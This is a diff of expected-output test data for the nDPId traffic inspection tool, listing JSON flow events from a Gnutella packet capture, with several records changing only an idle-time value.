-00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69142,"flow_last_seen":78169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.123.202.175","src_port":50237,"dst_port":37910,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69142,"flow_last_seen":78169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.123.202.175","src_port":50237,"dst_port":37910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75358,"flow_last_seen":84388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":50264,"dst_port":48380,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75358,"flow_last_seen":84388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":50264,"dst_port":48380,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69142,"flow_last_seen":78169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.123.202.175","src_port":50237,"dst_port":37910,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69142,"flow_last_seen":78169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.123.202.175","src_port":50237,"dst_port":37910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75358,"flow_last_seen":84388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":50264,"dst_port":48380,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75358,"flow_last_seen":84388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":50264,"dst_port":48380,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":433136,"flow_last_seen":433136,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"208.92.106.151","src_port":28681,"dst_port":32476,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":433136,"flow_last_seen":433136,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"208.92.106.151","src_port":28681,"dst_port":32476,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71203,"flow_last_seen":80232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50244,"dst_port":63978,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71203,"flow_last_seen":80232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50244,"dst_port":63978,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71204,"flow_last_seen":80232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":50247,"dst_port":51560,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71204,"flow_last_seen":80232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":50247,"dst_port":51560,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71203,"flow_last_seen":80232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50244,"dst_port":63978,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71203,"flow_last_seen":80232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50244,"dst_port":63978,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71204,"flow_last_seen":80232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":50247,"dst_port":51560,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71204,"flow_last_seen":80232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":50247,"dst_port":51560,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":491496,"flow_last_seen":491496,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"23.19.141.110","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":491496,"flow_last_seen":491496,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"23.19.141.110","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":312956,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.159.27.22","src_port":28681,"dst_port":17563,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -4075,54 +4075,54 @@ 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82061,"flow_last_seen":493284,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.99.164.4","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":551702,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"50.58.238.149","src_port":28681,"dst_port":6599,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":551702,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"50.58.238.149","src_port":28681,"dst_port":6599,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90738,"flow_last_seen":99778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":50292,"dst_port":11603,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90738,"flow_last_seen":99778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":50292,"dst_port":11603,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70172,"flow_last_seen":79201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.138.129.252","src_port":50243,"dst_port":27962,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70172,"flow_last_seen":79201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.138.129.252","src_port":50243,"dst_port":27962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90738,"flow_last_seen":99778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":50292,"dst_port":11603,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90738,"flow_last_seen":99778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":50292,"dst_port":11603,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70172,"flow_last_seen":79201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.138.129.252","src_port":50243,"dst_port":27962,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70172,"flow_last_seen":79201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.138.129.252","src_port":50243,"dst_port":27962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493288,"flow_last_seen":493288,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.239.213.146","src_port":28681,"dst_port":21750,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493288,"flow_last_seen":493288,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.239.213.146","src_port":28681,"dst_port":21750,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":82058,"flow_last_seen":551892,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.227.162.150","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":82058,"flow_last_seen":551892,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.227.162.150","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73299,"flow_last_seen":82326,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.236.203.37","src_port":50255,"dst_port":52165,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73299,"flow_last_seen":82326,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.236.203.37","src_port":50255,"dst_port":52165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73299,"flow_last_seen":82326,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.236.203.37","src_port":50255,"dst_port":52165,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73299,"flow_last_seen":82326,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.236.203.37","src_port":50255,"dst_port":52165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":82066,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.179.98.234","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":82066,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.179.98.234","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":88706,"flow_last_seen":97732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.215.130.156","src_port":50287,"dst_port":12405,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":88706,"flow_last_seen":97732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.215.130.156","src_port":50287,"dst_port":12405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":88706,"flow_last_seen":97732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.215.130.156","src_port":50287,"dst_port":12405,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":88706,"flow_last_seen":97732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.215.130.156","src_port":50287,"dst_port":12405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":71540,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.44.190.145","src_port":28681,"dst_port":10170,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":71540,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.44.190.145","src_port":28681,"dst_port":10170,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 